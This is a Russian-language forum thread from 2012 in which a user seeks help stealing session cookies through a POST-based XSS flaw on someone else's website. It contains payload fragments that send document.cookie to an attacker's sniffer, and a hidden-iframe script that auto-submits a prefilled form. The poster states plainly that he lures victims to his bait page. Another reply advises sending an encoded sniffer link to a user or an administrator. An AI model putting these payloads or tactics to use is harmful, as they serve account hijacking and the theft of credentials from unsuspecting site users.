ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   XSS POST на почтавике ? (https://forum.antichat.xyz/showthread.php?t=315874)

LABERT 28.01.2012 18:54

Недавно я нашел xss POST пассивку уязвимость на неком сайте site.com. Мною был создан сайт на бесплатном хостинге, где была размещена моя html страница, с framom, который открывает нашу страницу site.com/index.html, вводит скрипт в нашу форму "POST" и подтверждает её. В результате frame выводит его на http://evilhost.ru/user/login_form?login=xxx

В фрейме выполняется код по нашей форме "POST" и его перекидывает на бесплатный сниффер

document.location.href="http://sniff/s.php?"+document.cookie;'> Вот код на странице моего сайта:













alert(document.cookie)">







window.onload = function(){

var win = document.getElementById("iframe").contentWindow;

document.getElementById("form").onsubmit = function(e){

win.postMessage( document.getElementById("log").value );

win.postMessage( document.getElementById("pass").value );

win.postMessage( document.getElementById("pag").value );

e.preventDefault();

};

};





Если я в брузере ОПЕРА набираю свой сайт-приманку , он должен показать мне cookie c http://сайт с ХСС/user/login_form , выскакивает окошко :siteowner=1 и все .Получается cookie при загрузке iframe не передаются .Если отправляю iframe на сниффер то приходит:QUERY:siteowner=1, REFERER: http://мой_Сайт/form.html ,AGENT:Opera/9.80 (Windows.. и все.

ПОЧЕМУ в СКРИПТ script>alert(document.cookie) cookie не передаются ? Help...

OxoTnik 29.01.2012 00:00

нихуя ты закатил речь, проще обьясни что ты зделал?

NZT 29.01.2012 01:04

Я сам новичок в этом но с xss разобрался.

В этой статье все написано. Проще зделай как я : зарегся на online xss snifer тут , там есть уже готовый скрипт который ты должен подставлять после "=" в уязвимом сайте , и всю эту длиную ссылку (мне кажется лучше ее закодировать) даешь пользователю или админу чтобы он по ней прошел и тебе там в лог придут куки. Удачи.

LABERT 29.01.2012 10:20

Цитата:

Сообщение от NZT
Я сам новичок в этом но с xss разобрался.
В
этой
статье все написано. Проще зделай как я : зарегся на online xss snifer
тут
, там есть уже готовый скрипт который ты должен подставлять после "=" в уязвимом сайте , и всю эту длиную ссылку (мне кажется лучше ее закодировать) даешь пользователю или админу чтобы он по ней прошел и тебе там в лог придут куки. Удачи.

Так я и пользуюсь бесплатным online snifer , я же писал. Проблема

найти ошибку в моем post-запросе лежащем на моем сайте (см. выше). Ссылка типа: http://сайт сХСС/user/form?Login=akxhijfa&page= - ЭТО GET запрос , а уменя POST XSS....КАК сделать ссылку

,чтобы при нажатии на нее подгружалась заранее заполненная нами форма и чтобы она автоматом перебрасывала куки на snifer?

LABERT 30.01.2012 22:52

Неужели такого рода уязвимость можно применить только в сочетании с CSRF ? Ну где же Вы спецы ?

Ereee 31.01.2012 09:12

Можно и POST юзнуть. Но только тебе придется заманить жертву на свой сайт, а потом уже со своего сайта редиректить на сайт жертвы.

LABERT 31.01.2012 12:12

Цель именно такая , я заманиваю жертву ,подкидывая ему ссылку на свой сайт и с помощью этого кода ,c скрытым iframe:

Ferst;



function submit_form(){

window.evilframe.document.forms[0].submit();

}





он отправляется на заранее сформированную мною форму,которая сабмитит на сайт жертвы (уязвимый сайт с ХСС):

FORMA

img = new Image(); img.src = "http://сниффер"+document.cookie;"> //куки отправляются на сниффер



По идей куки должны приити ,но приходит только USER_AGENT,REFERER,IP,дата ,работу снифера проверял - работает,получается при переходе на мой сайт и отправке формы, в cookie ничего нет(просто пусто)... CSRF-защита или я что-то делаю не так?


Время: 03:40